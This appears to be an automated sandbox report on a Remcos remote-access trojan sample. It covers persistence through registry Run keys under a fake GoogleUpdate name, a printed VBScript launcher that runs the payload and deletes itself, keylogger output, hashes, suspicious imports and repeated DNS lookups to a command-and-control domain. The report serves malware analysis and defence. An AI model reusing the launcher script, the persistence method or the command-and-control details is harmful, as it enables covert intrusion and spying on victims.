Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target GoogleUpdate.exe, PID 8112 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:07:30	API Interceptor	3371723x Sleep call for process: GoogleUpdate.exe modified
19:06:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdater "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
19:07:05	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdater "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
19:07:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdater "C:\ProgramData\GoogleDat\GoogleUpdate.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
198.50.242.157	6THNtWwZbK	Get hash	malicious	Unknown	Browse
	r7jYRiiUEn	Get hash	malicious	Unknown	Browse
	Josho.x86	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	https://ville-tonnerre.com/CR_CM/config/information.php?access.x61307366953&&data.x=en_3abae6f9aa37b42f5c9bf622c	Get hash	malicious	Unknown	Browse	213.186.33.19
	Yv24LkKBY6.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
	Yv24LkKBY6.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	151.80.4.227
	4.elf	Get hash	malicious	Unknown	Browse	164.133.191.35
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	51.178.95.194
	https://www.depoqq.win/geno	Get hash	malicious	Unknown	Browse	54.36.150.184
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	51.195.88.199
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DwyWG_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLQ6-2Bsxhj60Ehn0XDEyVD6MCEZ1gioYU2lwgwkCuP2dHRX-2FYdZnQ31dEdwKW37GtXYj9HmZ1F0YrZWwSELmaO5K7noqwYAhu2QGcGqOtQYdjShoJMVTWOe6BTzZXQxib8Y6rd4SX-2BUwZMt-2BbgPIpal6PcS8i4PCSiFy8RF-2Ftt22Wpj713n23BIU6an4375YDP3	Get hash	malicious	Unknown	Browse	51.38.120.206
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyi	Get hash	malicious	Unknown	Browse	51.75.86.98

Process:	C:\Users\user\Desktop\DB5rQYsfd6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	480256
Entropy (8bit):	6.5897169192258875
Encrypted:	false
SSDEEP:	12288:wmnk7iLJbpIpiRL6I2WhSKQ9ZsfZQScn9:wiLJbpI7I2WhQqZ7c9
MD5:	991E707E324731F86A43900E34070808
SHA1:	5B5AFD8CECB865DE3341510F38D217F47490EEAD
SHA-256:	32D8C2A1BB4D5A515D9EB36C1286B0AC08624C8EA3DF0E97F12391558CE81153
SHA-512:	07411DFFBC6BEFF08A901AFA8DB3AF4BC7D214407F7B20A8570E16B3900F512AD8EE2D04E31BB9D870585B9825E9102078F6C40EB6DF292F09FFFE57EEA37F79
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 89%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..!...r...r...r.S r...r.S"r...r.S#r...r..Ur...r.o.r...r...s...r...s<..r...s$..r..Br...r...r*..r...sg..r...r...r...s...rRich...r................PE..L......c.................D...........'.......`....@.........................................................................X........`...I.......................9......8...........................H...@............`...............................text...KC.......D.................. ..`.rdata...s...`...t...H..............@..@.data...,\..........................@....tls.........@......................@....gfids..0....P......................@..@.rsrc....I...`...J..................@..@.reloc...9.......:..................@..B........................................................................................................................................................................................................

C:\ProgramData\GoogleDat\GoogleUpdate.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\DB5rQYsfd6.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\bootdata\logs.dat

Download File

Process:	C:\ProgramData\GoogleDat\GoogleUpdate.exe
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	3.3264850572432407
Encrypted:	false
SSDEEP:	6:MlsPl4xb5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:tgec0WFe5BWFe5BW+
MD5:	C25D2B34901992449E5AF26CE5F33BC7
SHA1:	53FD65232E80DA3FF456E990982AEEAE81BF8D96
SHA-256:	3E2091024041EBA7B736B54F9453719DC9E4692F1B703EE75F564C14A4F25F30
SHA-512:	57164FB3BF62602ABB920E0B61AE8080BD1E3CF53658C840008246E2FFC00FAEFE71485A9F01204614658C21156D4A9927DE563E7A155A4DBAD39166B09ADB03
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\bootdata\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.5./.0.1./.1.1. .1.4.:.0.6.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Temp\install.vbs

Download File

Process:	C:\Users\user\Desktop\DB5rQYsfd6.exe
File Type:	data
Category:	modified
Size (bytes):	404
Entropy (8bit):	3.47888963064342
Encrypted:	false
SSDEEP:	12:4D8o++ugypjBQMBvFQ4lOnbpZjeF0M/0aimi:4Dh+S0FNObHjeF0Nait
MD5:	BB683902F4D897285B9EB79D71A86DF6
SHA1:	6CA60977902F02B72AFD24CAA65BE77D06692B09
SHA-256:	1829D2480AB6BBFE942AADF34CB74CCD651427D10A9B51B222923FB921EBFC70
SHA-512:	EDBB9B416AD84CE216ED18DB11CBED0B46A079B7B2463E942B809A8A2FE5540EB1101114C5D0944DA383C02617DEC1017DF1235949CAF24EB515550F456EAEDA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.G.o.o.g.l.e.D.a.t.\.G.o.o.g.l.e.U.p.d.a.t.e...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5897169192258875
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DB5rQYsfd6.exe
File size:	480'256 bytes
MD5:	991e707e324731f86a43900e34070808
SHA1:	5b5afd8cecb865de3341510f38d217f47490eead
SHA256:	32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153
SHA512:	07411dffbc6beff08a901afa8db3af4bc7d214407f7b20a8570e16b3900f512ad8ee2d04e31bb9d870585b9825e9102078f6c40eb6df292f09fffe57eea37f79
SSDEEP:	12288:wmnk7iLJbpIpiRL6I2WhSKQ9ZsfZQScn9:wiLJbpI7I2WhQqZ7c9
TLSH:	E2A4AE02BAD2C072D57161344D2AE735DABDBC212835997BB3E61D5BFD30180A73A7B2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..!...r...r...r.S r...r.S"r...r.S#r...r..Ur...r.o.r...r...s...r...s<..r...s$..r..Br...r...r*..r...sg..r...r...r...s...rRich...

File Icon


Icon Hash:	95694d05214c1b33

Static PE Info

General

Entrypoint:	0x4327a4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x63011007 [Sat Aug 20 16:47:03 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	5d354883fe6f15fcf48045037a99fb7a

Entrypoint Preview

Instruction
call 00007F30ACBDE9B7h
jmp 00007F30ACBDE403h
push ebp
mov ebp, esp
sub esp, 00000324h
push ebx
push esi
push 00000017h
call 00007F30ACC0008Fh
test eax, eax
je 00007F30ACBDE577h
mov ecx, dword ptr [ebp+08h]
int 29h
xor esi, esi
lea eax, dword ptr [ebp-00000324h]
push 000002CCh
push esi
push eax
mov dword ptr [0046ED04h], esi
call 00007F30ACBE09C2h
add esp, 0Ch
mov dword ptr [ebp-00000274h], eax
mov dword ptr [ebp-00000278h], ecx
mov dword ptr [ebp-0000027Ch], edx
mov dword ptr [ebp-00000280h], ebx
mov dword ptr [ebp-00000284h], esi
mov dword ptr [ebp-00000288h], edi
mov word ptr [ebp-0000025Ch], ss
mov word ptr [ebp-00000268h], cs
mov word ptr [ebp-0000028Ch], ds
mov word ptr [ebp-00000290h], es
mov word ptr [ebp-00000294h], fs
mov word ptr [ebp-00000298h], gs
pushfd
pop dword ptr [ebp-00000264h]
mov eax, dword ptr [ebp+04h]
mov dword ptr [ebp-0000026Ch], eax
lea eax, dword ptr [ebp+04h]
mov dword ptr [ebp-00000260h], eax
mov dword ptr [ebp-00000324h], 00010001h
mov eax, dword ptr [eax-04h]
push 00000050h
mov dword ptr [ebp-00000270h], eax
lea eax, dword ptr [ebp-58h]
push esi
push eax
call 00007F30ACBE0939h

Rich Headers

Programming Language:

[C++] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6ba58	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x76000	0x490c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7b000	0x39ac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x69f10	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x69fa4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x69f48	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x56000	0x4ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5434b	0x54400	d720cbda6f644b704b35ac907cc56d49	False	0.574827290430267	data	6.624462527244835	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x56000	0x17392	0x17400	7f74ade58c43b15ee0754893e037c956	False	0.5001050067204301	data	5.8556949326481496	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6e000	0x5c2c	0xe00	121423e4a98fa367c6f6bf7e0478d052	False	0.21986607142857142	data	2.967957166860955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x74000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids	0x75000	0x230	0x400	c42969612e5c912b6c5d217fb5c3eeb3	False	0.3203125	data	2.368295399421673	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x76000	0x490c	0x4a00	a6b5568709acacd40b158841099b0873	False	0.25897381756756754	data	3.827761755523793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7b000	0x39ac	0x3a00	fdc450eb9b0c8ffc8324fb61b541b328	False	0.7665005387931034	data	6.71659520483491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x7618c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3421985815602837
RT_ICON	0x765f4	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.27704918032786885
RT_ICON	0x76f7c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.23686679174484052
RT_ICON	0x78024	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.22977178423236513
RT_RCDATA	0x7a5cc	0x2ff	data			1.014341590612777
RT_GROUP_ICON	0x7a8cc	0x3e	data	English	United States	0.8064516129032258

Imports

DLL	Import
KERNEL32.dll	CopyFileW, CreateMutexA, GetLocaleInfoA, CreateToolhelp32Snapshot, OpenMutexA, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetCurrentProcess, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FormatMessageA, AllocConsole, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, GetLongPathNameW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetStdHandle, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, ExpandEnvironmentStringsA, FindNextFileA, FindFirstFileA, GetFileSize, TerminateThread, GetLastError, SetFileAttributesW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, CreateDirectoryW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, ExitProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, QueryPerformanceCounter, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
USER32.dll	CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, DrawIcon, GetSystemMetrics, GetIconInfo, SystemParametersInfoW, GetCursorPos, RegisterClassExA, AppendMenuA, mouse_event, CreateWindowExA, DefWindowProcA, TrackPopupMenu, CreatePopupMenu, EnumDisplaySettingsW, SendInput, CloseWindow, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible
GDI32.dll	CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
SHELL32.dll	ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
SHLWAPI.dll	StrToIntA, PathFileExistsW, PathFileExistsA
WINMM.dll	waveInPrepareHeader, waveInStop, waveInUnprepareHeader, mciSendStringA, PlaySoundW, waveInOpen, waveInStart, waveInAddBuffer, waveInClose, mciSendStringW
WS2_32.dll	WSAGetLastError, recv, connect, socket, send, WSAStartup, closesocket, inet_ntoa, gethostbyname, WSASetLastError, inet_addr, gethostbyaddr, getservbyport, ntohs, getservbyname, htons, htonl
urlmon.dll	URLDownloadToFileW, URLOpenBlockingStreamW
gdiplus.dll	GdiplusStartup, GdipGetImageEncoders, GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipFree, GdipGetImageEncodersSize, GdipSaveImageToStream, GdipLoadImageFromStream
WININET.dll	InternetOpenUrlW, InternetCloseHandle, InternetReadFile, InternetOpenW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 20:06:59.274513960 CET	192.168.2.4	1.1.1.1	0x4b41	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:04.415268898 CET	192.168.2.4	1.1.1.1	0x494d	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:09.538820982 CET	192.168.2.4	1.1.1.1	0xa93a	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:14.732136011 CET	192.168.2.4	1.1.1.1	0xd280	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:19.820209026 CET	192.168.2.4	1.1.1.1	0x9242	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:24.929440975 CET	192.168.2.4	1.1.1.1	0x8eb2	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:30.014278889 CET	192.168.2.4	1.1.1.1	0xadfc	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:34.866699934 CET	192.168.2.4	1.1.1.1	0xe45e	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:39.777354956 CET	192.168.2.4	1.1.1.1	0x777	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:44.367064953 CET	192.168.2.4	1.1.1.1	0xb310	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:50.554352045 CET	192.168.2.4	1.1.1.1	0xf8ef	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:07:55.523149014 CET	192.168.2.4	1.1.1.1	0xb4de	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:00.350819111 CET	192.168.2.4	1.1.1.1	0x3685	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:05.288407087 CET	192.168.2.4	1.1.1.1	0x78c3	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:11.370599031 CET	192.168.2.4	1.1.1.1	0x8680	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:16.804186106 CET	192.168.2.4	1.1.1.1	0x91ff	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:22.309706926 CET	192.168.2.4	1.1.1.1	0x5eeb	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:27.710262060 CET	192.168.2.4	1.1.1.1	0xdde0	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:33.022811890 CET	192.168.2.4	1.1.1.1	0x9e05	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:38.104075909 CET	192.168.2.4	1.1.1.1	0x8cf3	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:42.289578915 CET	192.168.2.4	1.1.1.1	0x9981	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:48.118936062 CET	192.168.2.4	1.1.1.1	0x4229	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:53.303981066 CET	192.168.2.4	1.1.1.1	0xe410	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:08:58.429270983 CET	192.168.2.4	1.1.1.1	0xac04	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:03.289273024 CET	192.168.2.4	1.1.1.1	0x415f	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:08.600857973 CET	192.168.2.4	1.1.1.1	0x9871	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:13.317953110 CET	192.168.2.4	1.1.1.1	0xbed	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:18.827135086 CET	192.168.2.4	1.1.1.1	0xc71c	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:24.101114035 CET	192.168.2.4	1.1.1.1	0xd0bd	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 20:09:28.304354906 CET	192.168.2.4	1.1.1.1	0x1152	Standard query (0)	apleegodfivem.ddns.net	A (IP address)	IN (0x0001)	false
